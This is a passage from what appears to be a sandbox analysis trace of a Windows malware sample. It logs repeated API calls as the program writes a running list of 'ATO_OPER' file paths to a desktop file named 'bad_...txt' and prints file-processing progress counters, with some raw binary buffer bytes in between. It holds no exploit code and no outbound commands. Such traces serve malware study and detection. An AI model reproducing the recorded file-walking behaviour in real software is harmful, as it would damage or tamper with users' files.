Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\n¬\x024©\x8drà\x9f\x0eξáæ\x0e×\x9f\x8a\x11yý=tIªöÙ\x14WêÇ.\x0b+I\x06%\x84þ¬#·P\x9fT%\ræ°®ÉLª\x8fÛç/¸HÏ\x0e ÷\x87\x06Ó1-þÞ\x0c5D\x9b\\·Ê\x10ij8rÅ\x9cIA{6û", lpUsedDefaultChar=0x0) returned 851 [0189.346] WriteFile (in: hFile=0x1dc, lpBuffer=0x2665588*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x2665588*, lpNumberOfBytesWritten=0x2a1fe34*=0x353, lpOverlapped=0x0) returned 1 [0189.348] CloseHandle (hObject=0x1dc) returned 1 [0189.348] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3589 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0189.349] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3589 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3589 / B=13 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0189.349] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0189.350] Sleep (dwMilliseconds=0x5dc) [0191.343] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0191.344] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0191.344] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0191.345] Sleep (dwMilliseconds=0x5dc) [0192.999] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0192.999] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=13 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0192.999] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0193.000] Sleep (dwMilliseconds=0x5dc) [0195.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0195.033] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\n", cchWideChar=924, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 924 [0195.034] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\n", cchWideChar=924, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 924 [0195.034] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\n", cchWideChar=924, lpMultiByteStr=0x1f4ad38, cbMultiByte=924, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\n", lpUsedDefaultChar=0x0) returned 924 [0195.034] WriteFile (in: hFile=0x1dc, lpBuffer=0x1f4ad38*, nNumberOfBytesToWrite=0x39c, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesWritten=0x2a1fe34*=0x39c, lpOverlapped=0x0) returned 1 [0195.036] CloseHandle (hObject=0x1dc) returned 1 [0195.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0195.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0195.036] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0195.037] Sleep (dwMilliseconds=0x5dc) [0197.165] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0197.165] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa54dc, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0197.165] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0197.166] Sleep (dwMilliseconds=0x5dc) [0199.112] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0199.112] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=14 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0199.112] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0199.113] Sleep (dwMilliseconds=0x5dc) [0201.105] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0201.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\n", cchWideChar=974, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 974 [0201.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\n", cchWideChar=974, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 974 [0201.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\n", cchWideChar=974, lpMultiByteStr=0x1e99d58, cbMultiByte=974, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nrtPlaylist>\r\n \r\n \r\n\r\n \r\n\r\ns", lpUsedDefaultChar=0x0) returned 974 [0201.107] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e99d58*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x2a1fe34, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesWritten=0x2a1fe34*=0x3ce, lpOverlapped=0x0) returned 1 [0201.108] CloseHandle (hObject=0x1dc) returned 1 [0201.121] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0201.121] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0201.121] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0201.159] Sleep (dwMilliseconds=0x5dc) [0203.090] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0203.090] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0203.090] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0203.091] Sleep (dwMilliseconds=0x5dc) [0205.117] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0205.118] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", cchWideChar=39, lpMultiByteStr=0x1fa55f4, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][8]: G=3602 / B=15 / T=3858", lpUsedDefaultChar=0x0) returned 39 [0205.118] WriteFile (in: hFile=0x7, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2a1fec8, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2a1fec8*=0x27, lpOverlapped=0x0) returned 1 [0205.119] Sleep (dwMilliseconds=0x5dc) [0207.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bad_2660EAA9CA5C3071.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bad_2660eaa9ca5c3071.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0207.121] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\n", cchWideChar=1044, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1044 [0207.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\told.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\r\n", cchWideChar=1044, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1044 [0207.122] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\r\nATO_OPER: C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\r\nATO_OPER: C:\\Program Files\\MSBuild\\absolutetelnet.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\MSBuild\\executed_florists.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\r\nATO_OPER: C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\wabmig.exe\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\component.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nATO_OPER: C:\\Program Files\\Windows 